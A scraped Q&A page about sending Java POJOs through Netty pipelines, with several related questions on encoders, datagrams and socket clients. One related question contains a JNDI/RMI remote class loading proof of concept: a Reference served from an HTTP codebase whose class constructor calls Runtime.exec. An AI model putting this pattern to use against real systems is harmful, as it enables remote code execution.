Why doesn't the client receive the POJO which the server sends?
this blog sample is a bit difficult for me to follow.
I realize it's a lot of code, but I don't know how to make slim this down while still using a POJO, in this case Quote, between the client and server. The server sends a quote when a connection is established:
run:
[java] Aug 03, 2014 5:32:20 PM net.bounceme.dur.netty.QuoteServerInitializer <init>
[java] INFO: ..initializing..
[java] Aug 03, 2014 5:32:23 PM net.bounceme.dur.netty.QuoteServerInitializer initChannel
[java] INFO: ..adding to pipeline..
[java] Aug 03, 2014 5:32:23 PM net.bounceme.dur.netty.QuoteServerHandler <init>
[java] INFO: ..started..
[java] Aug 03, 2014 5:32:23 PM net.bounceme.dur.netty.QuoteServerHandler channelActive
[java] INFO: ..sending new server Quote..
[java] Aug 03, 2014 5:32:23 PM net.bounceme.dur.netty.QuoteEncoder encode
[java] INFO:
[java]
[java] id 0
[java] quote Where there is love there is life.
^Cthufir#dur:~/NetBeansProjects/QuoteServer$
thufir#dur:~/NetBeansProjects/QuoteServer$ ^C
thufir#dur:~/NetBeansProjects/QuoteServer$
but it never seems to arrive at the client:
run:
[java] Aug 03, 2014 5:32:23 PM net.bounceme.dur.netty.QuoteClientInitializer <init>
[java] INFO: ..initializing..
[java] Aug 03, 2014 5:32:23 PM net.bounceme.dur.netty.QuoteClientHandler channelActive
[java] INFO: ..sending new client Quote..
[java] Aug 03, 2014 5:32:23 PM net.bounceme.dur.netty.QuoteEncoder encode
[java] INFO:
[java]
[java] id 0
[java] quote client
^Cthufir#dur:~/NetBeansProjects/QuoteClient$
thufir#dur:~/NetBeansProjects/QuoteClient$
Similarly, the quote which the client sends never seems to make it to the server. Why?
server:
package net.bounceme.dur.netty;
import io.netty.bootstrap.ServerBootstrap;
import io.netty.channel.EventLoopGroup;
import io.netty.channel.nio.NioEventLoopGroup;
import io.netty.channel.socket.nio.NioServerSocketChannel;
import io.netty.handler.logging.LogLevel;
import io.netty.handler.logging.LoggingHandler;
import java.util.logging.Logger;
public final class QuoteServer {
private static final Logger log = Logger.getLogger(QuoteServer.class.getName());
public static void main(String... args) throws InterruptedException {
MyProps p = new MyProps();
int port = p.getServerPort();
new QuoteServer().pingPong(port);
}
private void pingPong(int port) throws InterruptedException {
EventLoopGroup bossGroup = new NioEventLoopGroup(1);
EventLoopGroup workerGroup = new NioEventLoopGroup();
try {
ServerBootstrap b = new ServerBootstrap();
b.group(bossGroup, workerGroup)
.channel(NioServerSocketChannel.class)
.handler(new LoggingHandler(LogLevel.DEBUG))
.childHandler(new QuoteServerInitializer());
b.bind(port).sync().channel().closeFuture().sync();
} finally {
bossGroup.shutdownGracefully();
workerGroup.shutdownGracefully();
}
}
}
server initializer:
package net.bounceme.dur.netty;
import io.netty.channel.ChannelInitializer;
import io.netty.channel.ChannelPipeline;
import io.netty.channel.socket.SocketChannel;
import io.netty.handler.codec.DelimiterBasedFrameDecoder;
import io.netty.handler.codec.Delimiters;
import java.util.logging.Logger;
public class QuoteServerInitializer extends ChannelInitializer<SocketChannel> {
private static final Logger log = Logger.getLogger(QuoteServerInitializer.class.getName());
public QuoteServerInitializer() {
log.info("..initializing..");
}
#Override
public void initChannel(SocketChannel ch) throws Exception {
log.info("..adding to pipeline..");
ChannelPipeline pipeline = ch.pipeline();
pipeline.addLast(new DelimiterBasedFrameDecoder(8192, Delimiters.lineDelimiter()));
pipeline.addLast(new QuoteDecoder());
pipeline.addLast(new QuoteEncoder());
pipeline.addLast(new QuoteServerHandler());
}
}
server handler:
package net.bounceme.dur.netty;
import io.netty.channel.ChannelHandlerContext;
import io.netty.channel.SimpleChannelInboundHandler;
import java.util.Random;
import java.util.logging.Logger;
import net.bounceme.dur.jdbc.Quote;
public class QuoteServerHandler extends SimpleChannelInboundHandler<Quote> {
private static final Logger log = Logger.getLogger(QuoteServerHandler.class.getName());
private static final Random random = new Random();
public QuoteServerHandler() {
log.info("..started..");
}
// Quotes from Mohandas K. Gandhi:
private static final String[] quotes = {
"Where there is love there is life.",
"First they ignore you, then they laugh at you, then they fight you, then you win.",
"Be the change you want to see in the world.",
"The weak can never forgive. Forgiveness is the attribute of the strong.",};
private static Quote nextQuote() {
int quoteId;
synchronized (random) {
quoteId = random.nextInt(quotes.length);
}
return new Quote(quotes[quoteId]);
}
#Override
public void channelActive(ChannelHandlerContext ctx) throws Exception {
log.info("..sending new server Quote..");
ctx.writeAndFlush(nextQuote());
}
#Override
protected void channelRead0(ChannelHandlerContext chc, Quote quote) throws Exception {
log.info(quote.toString());
chc.writeAndFlush(nextQuote());
}
#Override
public void channelRead(ChannelHandlerContext ctx, Object msg) {
log.info(msg.toString());
ctx.writeAndFlush(nextQuote());
}
#Override
public void channelReadComplete(ChannelHandlerContext ctx) {
ctx.flush();
}
}
client:
package net.bounceme.dur.netty;
import io.netty.bootstrap.Bootstrap;
import io.netty.channel.ChannelFuture;
import io.netty.channel.EventLoopGroup;
import io.netty.channel.nio.NioEventLoopGroup;
import io.netty.channel.socket.nio.NioSocketChannel;
import java.io.IOException;
import java.util.logging.Logger;
public final class QuoteClient {
private static final Logger log = Logger.getLogger(QuoteClient.class.getName());
public static void main(String... args) throws InterruptedException, IOException {
new QuoteClient().connect();
}
public void connect() throws InterruptedException, IOException {
MyProps p = new MyProps();
String host = p.getHost();
int port = p.getServerPort();
pingPong(host, port);
}
public void pingPong(String host, int port) throws InterruptedException, IOException {
EventLoopGroup group = new NioEventLoopGroup();
try {
Bootstrap b = new Bootstrap();
b.group(group)
.channel(NioSocketChannel.class)
.handler(new QuoteClientInitializer());
ChannelFuture cf = b.connect(host, port);
cf.sync().channel().closeFuture().sync();
} finally {
group.shutdownGracefully();
}
}
}
client initializer:
package net.bounceme.dur.netty;
import io.netty.channel.ChannelInitializer;
import io.netty.channel.ChannelPipeline;
import io.netty.channel.socket.SocketChannel;
import io.netty.handler.codec.DelimiterBasedFrameDecoder;
import io.netty.handler.codec.Delimiters;
import java.util.logging.Logger;
public class QuoteClientInitializer extends ChannelInitializer<SocketChannel> {
private static final Logger log = Logger.getLogger(QuoteClientInitializer.class.getName());
public QuoteClientInitializer() {
log.info("..initializing..");
}
#Override
public void initChannel(SocketChannel ch) {
ChannelPipeline pipeline = ch.pipeline();
pipeline.addLast(new DelimiterBasedFrameDecoder(8192, Delimiters.lineDelimiter()));
pipeline.addLast(new QuoteDecoder());
pipeline.addLast(new QuoteEncoder());
pipeline.addLast(new QuoteClientHandler());
}
}
client handler:
package net.bounceme.dur.netty;
import io.netty.channel.ChannelHandler.Sharable;
import io.netty.channel.ChannelHandlerContext;
import io.netty.channel.SimpleChannelInboundHandler;
import java.util.logging.Logger;
import net.bounceme.dur.jdbc.Quote;
#Sharable
public class QuoteClientHandler extends SimpleChannelInboundHandler<Quote> {
private static final Logger log = Logger.getLogger(QuoteClient.class.getName());
#Override
public void channelActive(ChannelHandlerContext ctx) throws Exception {
log.info("..sending new client Quote..");
ctx.writeAndFlush(new Quote("client"));
}
#Override
protected void channelRead0(ChannelHandlerContext chc, Quote quote) throws Exception {
log.info(quote.toString());
}
#Override
public void channelRead(ChannelHandlerContext ctx, Object msg) {
log.info(msg.toString());
ctx.writeAndFlush(new Quote("client"));
}
#Override
public void channelReadComplete(ChannelHandlerContext ctx) {
ctx.fireChannelReadComplete();
}
#Override
public void exceptionCaught(ChannelHandlerContext ctx, Throwable cause) {
log.info(cause.toString());
ctx.close();
}
}
decoder:
package net.bounceme.dur.netty;
import io.netty.channel.ChannelHandlerContext;
import io.netty.handler.codec.MessageToMessageDecoder;
import java.util.List;
import java.util.logging.Logger;
import net.bounceme.dur.jdbc.Quote;
public class QuoteDecoder extends MessageToMessageDecoder<Quote> {
private static final Logger log = Logger.getLogger(QuoteDecoder.class.getName());
#Override
protected void decode(ChannelHandlerContext chc, Quote quote, List<Object> list) throws Exception {
log.info(quote.toString());
list.add(quote);
}
}
encoder:
package net.bounceme.dur.netty;
import io.netty.channel.ChannelHandlerContext;
import io.netty.handler.codec.MessageToMessageEncoder;
import java.util.List;
import java.util.logging.Logger;
import net.bounceme.dur.jdbc.Quote;
public class QuoteEncoder extends MessageToMessageEncoder<Quote> {
private static final Logger log = Logger.getLogger(QuoteEncoder.class.getName());
#Override
protected void encode(ChannelHandlerContext chc, Quote quote, List<Object> list) throws Exception {
log.info(quote.toString());
list.add(quote);
}
}
It's quite notable that the en/de-code methods never log to the console.
If you edit the channelActive method of your QuoteServerHandler to the following:
#Override
public void channelActive(ChannelHandlerContext ctx) throws Exception {
log.info("..sending new server Quote..");
ChannelFuture cf = ctx.writeAndFlush(nextQuote());
if (!cf.isSuccess()){
log.log(Level.SEVERE, cf.toString());
}
ctx.fireChannelActive();
}
then you will most probably get a message saying: unsupported message type: Quote
Your encoder needs to encode it into something that is supported. I don't now what that would be though.
I would suggest using an ObjectEncoder which could encode your Quote into a ByteBuf.
On the receiving site you need an ObjectDecoder. After that you can cast your received msg in your ClientHandler back to Quote.
Related
my java version is: 1.8.0_282
this is client:
import java.rmi.registry.*;
import javax.naming.*;
public class RegistryClient {
public static void main(String[] args) throws Exception {
System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
Context registry = new InitialContext();
registry.lookup("rmi://127.0.0.1:1099/Demo");
System.out.println("done");
}
}
this is server:
import java.rmi.registry.*;
import javax.naming.*;
import com.sun.jndi.rmi.registry.ReferenceWrapper;
public class RegistryServer {
public static void main(String[] args) throws Exception {
Registry registry = LocateRegistry.createRegistry(1099);
Reference refObj = new Reference(
"xxx",
"RMIRegistryDemoRemote",
"http://127.0.0.1:8000/"
);
ReferenceWrapper hello = new ReferenceWrapper(refObj);
registry.bind("Demo", hello);
System.out.println("[!] server is ready");
}
}
this is the interface and implement of RMIRegistryDemo:
import java.rmi.*;
public interface RMIRegistryDemo extends Remote {
String sayHello(String name) throws Exception;
}
import java.rmi.server.*;
import java.rmi.*;
public class RMIRegistryDemoImpl extends UnicastRemoteObject implements RMIRegistryDemo {
public RMIRegistryDemoImpl() throws Exception {}
String id = "10";
#Override
public String sayHello(String name) {
System.out.println(id);
return "Hi, " + name;
}
}
this is the remote .class:
import java.io.IOException;
public class RMIRegistryDemoRemote {
public RMIRegistryDemoRemote() throws IOException {
final Process process = Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
}
}
after:
run RegistryServer
deployed a web server to send RMIRegistryDemoRemote.class
run RegistryClient
the client just prints "done", and no access log in my weblog:
# overflow in ~/Downloads/test [16:16:44]
» javac RegistryClient.java && java RegistryClient
done
# overflow in ~/Downloads/test/remote [16:20:05]
» python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
what causes it?
I'm using Netty for a server that needs to handle hundreds of thousands of requests per second while maintaining as little variance as possible on response latencies. I'm doing some final optimizations and I'm currently looking into reducing unnecessary memory allocation by reusing whatever objects I can. A simplified example of a server highlighting my issue is the following:
import io.netty.bootstrap.ServerBootstrap;
import io.netty.channel.ChannelFuture;
import io.netty.channel.ChannelInitializer;
import io.netty.channel.ChannelPipeline;
import io.netty.channel.EventLoopGroup;
import io.netty.channel.nio.NioEventLoopGroup;
import io.netty.channel.socket.SocketChannel;
import io.netty.channel.socket.nio.NioServerSocketChannel;
import io.netty.handler.codec.http.HttpServerCodec;
import io.netty.handler.codec.http.HttpObjectAggregator;
public class NettyServer {
public void run() throws Exception {
EventLoopGroup bossGroup = new NioEventLoopGroup();
EventLoopGroup workerGroup = new NioEventLoopGroup();
try {
ServerBootstrap b = new ServerBootstrap();
b.group(bossGroup, workerGroup)
.channel(NioServerSocketChannel.class)
.childHandler(new ChannelInitializer<SocketChannel>() {
#Override
public void initChannel(SocketChannel ch) throws Exception {
ChannelPipeline p = ch.pipeline();
p.addLast(new HttpServerCodec());
p.addLast(new HttpObjectAggregator(1048576));
p.addLast(new NettyHandler());
}
});
ChannelFuture f = b.bind(8080).sync();
f.channel().closeFuture().sync();
} finally {
workerGroup.shutdownGracefully();
bossGroup.shutdownGracefully();
}
}
public static void main(String[] args) throws Exception {
new NettyServer().run();
}
}
The handler code is the following:
import io.netty.buffer.Unpooled;
import io.netty.channel.ChannelFuture;
import io.netty.channel.ChannelFutureListener;
import io.netty.channel.ChannelHandlerContext;
import io.netty.channel.SimpleChannelInboundHandler;
import io.netty.handler.codec.http.DefaultFullHttpResponse;
import io.netty.handler.codec.http.FullHttpRequest;
import io.netty.handler.codec.http.FullHttpResponse;
import io.netty.handler.codec.http.HttpUtil;
import io.netty.handler.codec.http.HttpHeaderNames;
import io.netty.handler.codec.http.HttpHeaderValues;
import io.netty.handler.codec.http.HttpResponseStatus;
import io.netty.handler.codec.http.HttpVersion;
import io.netty.handler.codec.http.QueryStringDecoder;
import io.netty.util.CharsetUtil;
public class NettyHandler extends SimpleChannelInboundHandler<Object> {
private static final FullHttpResponse okResponse = OkResponse();
private static final FullHttpResponse failResponse = FailResponse();
#Override
public void channelReadComplete(ChannelHandlerContext ctx) {
ctx.flush();
}
#Override
protected void channelRead0(ChannelHandlerContext ctx, Object msg) {
FullHttpRequest request = (FullHttpRequest) msg;
QueryStringDecoder query = new QueryStringDecoder(request.getUri());
String path = query.path();
ChannelFuture f;
boolean keepAlive = HttpUtil.isKeepAlive(request);
if ("/ok".equals(path)) {
f = ctx.write(okResponse);
} else {
f = ctx.write(failResponse);
keepAlive = false;
}
if (!keepAlive) {
f.addListener(ChannelFutureListener.CLOSE);
}
}
private static FullHttpResponse OkResponse() {
String data = "{ \"status\": ok }";
FullHttpResponse response = new DefaultFullHttpResponse(
HttpVersion.HTTP_1_1,
HttpResponseStatus.OK,
Unpooled.copiedBuffer(data, CharsetUtil.UTF_8)
);
response.headers().set(HttpHeaderNames.CONTENT_TYPE, HttpHeaderValues.APPLICATION_JSON);
response.headers().set(HttpHeaderNames.CACHE_CONTROL, "max-age=0, no-cache, must-revalidate, proxy-revalidate");
return response;
}
private static FullHttpResponse FailResponse() {
String data = "{ \"status\": fail }";
FullHttpResponse response = new DefaultFullHttpResponse(
HttpVersion.HTTP_1_1,
HttpResponseStatus.OK,
Unpooled.copiedBuffer(data, CharsetUtil.UTF_8)
);
response.headers().set(HttpHeaderNames.CONTENT_TYPE, HttpHeaderValues.APPLICATION_JSON);
response.headers().set(HttpHeaderNames.CACHE_CONTROL, "max-age=0, no-cache, must-revalidate, proxy-revalidate");
return response;
}
}
The handler shows what I'm trying to accomplish. The handler contains static instances of fixed HTTP responses. For the server all responses except error codes come from a small group and can be preconstructed. With the above code the second query to a handler will fail, since Netty's ref counts for the response has gone down to zero. I was expecting that just calling retain() on the object would be enough, but it doesn't look like it is.
What would be the most efficient way to reuse the HTTP response objects between requests?
You should call retainedDuplicate() as otherwise the readerIndex etc may become “invalid”
For right now, the client instantiates the Swing GUI. This seems to work, to a degree.
What's the correct flow to allow messages to get passed to, and received from, the GUI?
In the GUI, which extends JFrame for convenience:
private void nextTitleActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_nextTitleActionPerformed
title = new Title();
}//GEN-LAST:event_nextTitleActionPerformed
how do I pass that title through netty, that is, to the ClientHandler, so that this object is sent from the client to the server?
I toyed with starting the Client and ClientHandler from within the GUI directly, but there's no real "instance" of ClientHandler to invoke method calls on.
Perhaps there's a Netty helper or interface which the Swing GUI can pass methods through? I've read a bit of a book on netty, but that book doesn't seem to address this topic. (Hmm, I'll take another look at the appendix, it has some demo's.)
client code:
package net.bounceme.dur.client.netty;
import io.netty.bootstrap.Bootstrap;
import io.netty.channel.ChannelInitializer;
import io.netty.channel.ChannelPipeline;
import io.netty.channel.EventLoopGroup;
import io.netty.channel.nio.NioEventLoopGroup;
import io.netty.channel.socket.SocketChannel;
import io.netty.channel.socket.nio.NioSocketChannel;
import io.netty.handler.codec.serialization.ClassResolvers;
import io.netty.handler.codec.serialization.ObjectDecoder;
import io.netty.handler.codec.serialization.ObjectEncoder;
import java.util.logging.Logger;
import javax.net.ssl.SSLException;
import net.bounceme.dur.client.gui.TitlesGUI;
public final class Client {
private static final Logger log = Logger.getLogger(Client.class.getName());
private final TitlesGUI gui = new TitlesGUI();
public Client() {
}
public static void main(String... args) throws InterruptedException, SSLException {
MyProps p = new MyProps();
String host = p.getHost();
int port = p.getServerPort();
new Client().startClient(host, port);
}
public void startClient(final String host, final int port) throws SSLException, InterruptedException {
gui.setVisible(true);
EventLoopGroup group = new NioEventLoopGroup();
try {
Bootstrap b = new Bootstrap();
b.group(group)
.channel(NioSocketChannel.class)
.handler(new ChannelInitializer<SocketChannel>() {
#Override
public void initChannel(SocketChannel ch) throws Exception {
ChannelPipeline p = ch.pipeline();
p.addLast(
new ObjectEncoder(),
new ObjectDecoder(ClassResolvers.cacheDisabled(null)),
new ClientHandler());
}
});
b.connect(host, port).sync().channel().closeFuture().sync();
} finally {
group.shutdownGracefully();
}
}
}
handler code:
package net.bounceme.dur.client.netty;
import io.netty.channel.ChannelHandlerContext;
import io.netty.channel.SimpleChannelInboundHandler;
import java.util.logging.Logger;
import net.bounceme.dur.client.jdbc.Title;
public class ClientHandler extends SimpleChannelInboundHandler<Title> {
private static final Logger log = Logger.getLogger(ClientHandler.class.getName());
public ClientHandler() {
}
#Override
public boolean acceptInboundMessage(Object msg) throws Exception {
return true;
}
#Override
public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception {
log.info(msg.toString());
ctx.write(new Title());
}
#Override
protected void channelRead0(ChannelHandlerContext chc, Title title) throws Exception {
log.info(title.toString());
chc.write(new Title());
}
}
server output:
BUILD SUCCESSFUL
Total time: 3 seconds
Jul 26, 2014 8:10:24 PM io.netty.handler.logging.LoggingHandler channelRegistered
INFO: [id: 0x15d5077e] REGISTERED
Jul 26, 2014 8:10:24 PM io.netty.handler.logging.LoggingHandler bind
INFO: [id: 0x15d5077e] BIND(0.0.0.0/0.0.0.0:4454)
Jul 26, 2014 8:10:24 PM io.netty.handler.logging.LoggingHandler channelActive
INFO: [id: 0x15d5077e, /0:0:0:0:0:0:0:0:4454] ACTIVE
Jul 26, 2014 8:13:31 PM io.netty.handler.logging.LoggingHandler logMessage
INFO: [id: 0x15d5077e, /0:0:0:0:0:0:0:0:4454] RECEIVED: [id: 0xbcbabb1e, /127.0.0.1:34604 => /127.0.0.1:4454]
^Cthufir#dur:~/NetBeansProjects/AgentServer$
thufir#dur:~/NetBeansProjects/AgentServer$
The server seems to acknowledge a connection from the client (and can send and receive with a headless version).
The question is:
how do I send objects to the GUI, or get objects from the GUI? The TitlesGUI class extends JFrame.
I want to modify the client handler to use Foo instead of Datagram -- what changes are required in the client itself?
Surely it's not necessary to strictly keep to datagrams to send and receive with Netty? The Factorial example uses BigInteger, so, surely, it's possible to use POJO's.
Any and all attempts to create a class like:
class FooClientHandler extends SimpleChannelInboundHandler<Foo> are just non-starters for me, it literally won't send or receive with a server. (Yes, both client and server use similar handlers, generic classes with Foo.) So, I'm coming at this now from working code.
What's the key distinction between the factorial handler and the the datagram handler below? Or, is the primary distinction in how it's used in the client?
client:
package net.bounceme.dur.netty;
import io.netty.bootstrap.Bootstrap;
import io.netty.buffer.Unpooled;
import io.netty.channel.Channel;
import io.netty.channel.ChannelOption;
import io.netty.channel.EventLoopGroup;
import io.netty.channel.nio.NioEventLoopGroup;
import io.netty.channel.socket.DatagramPacket;
import io.netty.channel.socket.nio.NioDatagramChannel;
import io.netty.util.CharsetUtil;
import java.net.InetSocketAddress;
import java.util.logging.Logger;
import net.bounceme.dur.client.gui.MyProps;
public final class Client {
private static final Logger log = Logger.getLogger(Client.class.getName());
public void connect() throws InterruptedException {
MyProps p = new MyProps();
String host = p.getHost();
int port = p.getServerPort();
pingPongDatagram(host, port);
}
public void pingPongDatagram(String host, int port) throws InterruptedException {
EventLoopGroup group = new NioEventLoopGroup();
try {
Bootstrap b = new Bootstrap();
b.group(group)
.channel(NioDatagramChannel.class)
.option(ChannelOption.SO_BROADCAST, true)
.handler(new DatagramClientHandler());
Channel ch = b.bind(0).sync().channel();
ch.writeAndFlush(new DatagramPacket(
Unpooled.copiedBuffer("QOTM?", CharsetUtil.UTF_8),
new InetSocketAddress(host, port))).sync();
log.info("wrote packet");
if (!ch.closeFuture().await(5000)) {
log.warning("server timed out");
}
} finally {
group.shutdownGracefully();
}
}
}
handler:
package net.bounceme.dur.netty;
import io.netty.buffer.Unpooled;
import io.netty.channel.ChannelHandlerContext;
import io.netty.channel.SimpleChannelInboundHandler;
import io.netty.channel.socket.DatagramPacket;
import io.netty.util.CharsetUtil;
import java.net.InetSocketAddress;
import java.util.logging.Logger;
public class DatagramClientHandler extends SimpleChannelInboundHandler<DatagramPacket> {
private static final Logger log = Logger.getLogger(DatagramClientHandler.class.getName());
#Override
public void channelRead0(ChannelHandlerContext ctx, DatagramPacket msg) throws Exception {
String response = msg.content().toString(CharsetUtil.UTF_8);
log.info(response);
DatagramPacket foo = new DatagramPacket(
Unpooled.copiedBuffer("QOTM?", CharsetUtil.UTF_8),
new InetSocketAddress("localhost", 4454));
ctx.writeAndFlush(foo);
}
#Override
public void exceptionCaught(ChannelHandlerContext ctx, Throwable cause) {
log.severe(cause.toString());
ctx.close();
}
}
I omitted the server code, it's almost exactly as in the Ghandi quote example.
What changes do I need to make to the client so that the handler can use Foo instead of DatagramPacket?
All I can say with certainty is that this client:
package net.bounceme.dur.netty;
import io.netty.bootstrap.Bootstrap;
import io.netty.buffer.Unpooled;
import io.netty.channel.Channel;
import io.netty.channel.ChannelOption;
import io.netty.channel.EventLoopGroup;
import io.netty.channel.nio.NioEventLoopGroup;
import io.netty.channel.socket.DatagramPacket;
import io.netty.channel.socket.nio.NioDatagramChannel;
import io.netty.util.CharsetUtil;
import java.net.InetSocketAddress;
import java.util.logging.Logger;
import net.bounceme.dur.client.gui.MyProps;
import net.bounceme.dur.client.jdbc.Title;
public final class Client {
private static final Logger log = Logger.getLogger(Client.class.getName());
public void connect() throws InterruptedException {
MyProps p = new MyProps();
String host = p.getHost();
int port = p.getServerPort();
pingPongDatagram(host, port);
}
public void pingPongDatagram(String host, int port) throws InterruptedException {
EventLoopGroup group = new NioEventLoopGroup();
try {
Bootstrap b = new Bootstrap();
b.group(group)
.channel(NioDatagramChannel.class)
.option(ChannelOption.SO_BROADCAST, true)
.handler(new TitleClientHandler());
Channel ch = b.bind(0).sync().channel();
ch.writeAndFlush(new DatagramPacket(
Unpooled.copiedBuffer("QOTM?", CharsetUtil.UTF_8),
new InetSocketAddress(host, port))).sync();
ch.writeAndFlush(new Title());
log.info("wrote packets");
if (!ch.closeFuture().await(5000)) {
log.warning("server timed out");
}
} finally {
group.shutdownGracefully();
}
}
}
and handler:
package net.bounceme.dur.netty;
import io.netty.channel.ChannelHandlerContext;
import io.netty.channel.SimpleChannelInboundHandler;
import java.util.logging.Logger;
import net.bounceme.dur.client.jdbc.Title;
public class TitleClientHandler extends SimpleChannelInboundHandler<Title> {
private static final Logger log = Logger.getLogger(TitleClientHandler.class.getName());
#Override
public void exceptionCaught(ChannelHandlerContext ctx, Throwable cause) {
log.severe(cause.toString());
ctx.close();
}
#Override
protected void channelRead0(ChannelHandlerContext chc, Title title) throws Exception {
log.info(title.toString());
}
}
don't, seemingly, communicate at all with the server -- even when the server has been modified accordingly.
Unfortunately, I don't understand this output from the netty server:
BUILD SUCCESSFUL
Total time: 3 seconds
Jul 27, 2014 2:04:44 AM io.netty.handler.logging.LoggingHandler channelRegistered
INFO: [id: 0xcad25a31] REGISTERED
Jul 27, 2014 2:04:44 AM io.netty.handler.logging.LoggingHandler bind
INFO: [id: 0xcad25a31] BIND(0.0.0.0/0.0.0.0:4454)
Jul 27, 2014 2:04:44 AM io.netty.handler.logging.LoggingHandler channelActive
INFO: [id: 0xcad25a31, /0:0:0:0:0:0:0:0:4454] ACTIVE
Jul 27, 2014 2:04:59 AM io.netty.handler.logging.LoggingHandler logMessage
INFO: [id: 0xcad25a31, /0:0:0:0:0:0:0:0:4454] RECEIVED: [id: 0xff40b8a2, /127.0.0.1:37558 => /127.0.0.1:4454]
Jul 27, 2014 2:04:59 AM net.bounceme.dur.netty.ServerHandler <init>
INFO: starting..
Jul 27, 2014 2:04:59 AM io.netty.channel.DefaultChannelPipeline$TailContext exceptionCaught
WARNING: An exceptionCaught() event was fired, and it reached at the tail of the pipeline. It usually means the last handler in the pipeline did not handle the exception.
io.netty.handler.codec.TooLongFrameException: Adjusted frame length exceeds 1048576: 2901213193 - discarded
at io.netty.handler.codec.LengthFieldBasedFrameDecoder.fail(LengthFieldBasedFrameDecoder.java:501)
at io.netty.handler.codec.LengthFieldBasedFrameDecoder.failIfNecessary(LengthFieldBasedFrameDecoder.java:477)
at io.netty.handler.codec.LengthFieldBasedFrameDecoder.decode(LengthFieldBasedFrameDecoder.java:403)
at io.netty.handler.codec.serialization.ObjectDecoder.decode(ObjectDecoder.java:68)
at io.netty.handler.codec.LengthFieldBasedFrameDecoder.decode(LengthFieldBasedFrameDecoder.java:343)
at io.netty.handler.codec.ByteToMessageDecoder.callDecode(ByteToMessageDecoder.java:241)
at io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:149)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:333)
at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:319)
at io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:787)
at io.netty.channel.nio.AbstractNioByteChannel$NioByteUnsafe.read(AbstractNioByteChannel.java:125)
at io.netty.channel.nio.NioEventLoop.processSelectedKey(NioEventLoop.java:511)
at io.netty.channel.nio.NioEventLoop.processSelectedKeysOptimized(NioEventLoop.java:468)
at io.netty.channel.nio.NioEventLoop.processSelectedKeys(NioEventLoop.java:382)
at io.netty.channel.nio.NioEventLoop.run(NioEventLoop.java:354)
at io.netty.util.concurrent.SingleThreadEventExecutor$2.run(SingleThreadEventExecutor.java:116)
at io.netty.util.concurrent.DefaultThreadFactory$DefaultRunnableDecorator.run(DefaultThreadFactory.java:137)
at java.lang.Thread.run(Thread.java:744)
^Cthufir#dur:~/NetBeansProjects/AgentServer$
thufir#dur:~/NetBeansProjects/AgentServer$
Presumably the netty-based server is complaining that it's receiving bad data in some respect?
client code:
package net.bounceme.dur.client.gui;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.net.Socket;
import java.util.logging.FileHandler;
import java.util.logging.Handler;
import java.util.logging.Level;
import java.util.logging.Logger;
import java.util.logging.SimpleFormatter;
import net.bounceme.dur.client.jdbc.Title;
public final class ApplicationDriver {
private static final Logger log = Logger.getLogger(ApplicationDriver.class.getName());
private TitlesGUI gui = null;
private Handler handler = null;
public ApplicationDriver() throws IOException, ClassNotFoundException {
handler = new FileHandler("application.log");
handler.setFormatter(new SimpleFormatter());
log.setLevel(Level.INFO);
log.addHandler(handler);
log.info("starting log..");
MyProps p = new MyProps();
String host = p.getHost();
int port = p.getServerPort();
guiThread();
readWrite(host, port);
}
private void guiThread() {
Thread g;
g = new Thread() {
#Override
public void run() {
try {
gui = new TitlesGUI();
} catch (IOException ex) {
log.severe(ex.toString());
}
gui.setVisible(true);
}
};
g.start();
}
public static void main(String... args) throws IOException, ClassNotFoundException {
new ApplicationDriver();
}
private void readWrite(final String host, final int port) throws IOException {
Thread inputOutput;
final Socket socket = new Socket(host, port);
inputOutput = new Thread() {
#Override
public void run() {
while (true) {
try (ObjectOutputStream objectOutputStream = new ObjectOutputStream(socket.getOutputStream());
ObjectInputStream objectInputStream = new ObjectInputStream(socket.getInputStream())) {
gui.setTitle((Title) objectInputStream.readObject());
Thread.sleep(1000);
} catch (IOException | ClassNotFoundException | InterruptedException ex) {
log.severe(ex.toString());
}
}
}
};
inputOutput.start();
}
}
is it a problem that the client is using regular sockets instead of netty? Both on the client and server side POJO's are being sent. (The Title class is serializable and the serialVersionUID values match up.)
a method from the GUI client (which is a bit large, it's a Netbeans Swing JFrame):
public void setTitle(Title title) {
this.title = title;
text.setText(title.toString());
}
the point of the above method is for something to send objects to the GUI, which is then updated accordingly. Similarly, I want to fire updates, or other-wise wire the GUI to socket i/o.
I don't really understand the output from the netty server. Is it a problem that the server uses netty while the client uses sockets? Both use the same POJO, with the serialVersionUID value. Here's the netty handler code:
package net.bounceme.dur.netty;
import io.netty.channel.ChannelHandlerContext;
import io.netty.channel.SimpleChannelInboundHandler;
import java.util.logging.Logger;
import net.bounceme.dur.jdbc.Title;
public class ServerHandler extends SimpleChannelInboundHandler<Title> {
private static final Logger log = Logger.getLogger(ServerHandler.class.getName());
public ServerHandler() {
log.info("starting..");
}
#Override
public boolean acceptInboundMessage(Object msg) throws Exception {
log.info(msg.toString());
return true;
}
#Override
public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception {
log.info(msg.toString());
ctx.write(new Title());
}
#Override
protected void channelRead0(ChannelHandlerContext chc, Title title) throws Exception {
log.info(title.toString());
chc.write(new Title());
}
}
Apparently, none of the server handler code is executed, as everything explodes immediately after the client connects.
server code:
package net.bounceme.dur.netty;
import io.netty.bootstrap.ServerBootstrap;
import io.netty.channel.ChannelInitializer;
import io.netty.channel.ChannelPipeline;
import io.netty.channel.EventLoopGroup;
import io.netty.channel.nio.NioEventLoopGroup;
import io.netty.channel.socket.SocketChannel;
import io.netty.channel.socket.nio.NioServerSocketChannel;
import io.netty.handler.codec.serialization.ClassResolvers;
import io.netty.handler.codec.serialization.ObjectDecoder;
import io.netty.handler.codec.serialization.ObjectEncoder;
import io.netty.handler.logging.LogLevel;
import io.netty.handler.logging.LoggingHandler;
import java.security.cert.CertificateException;
import java.util.logging.Logger;
import javax.net.ssl.SSLException;
public final class Server {
private static final Logger log = Logger.getLogger(Server.class.getName());
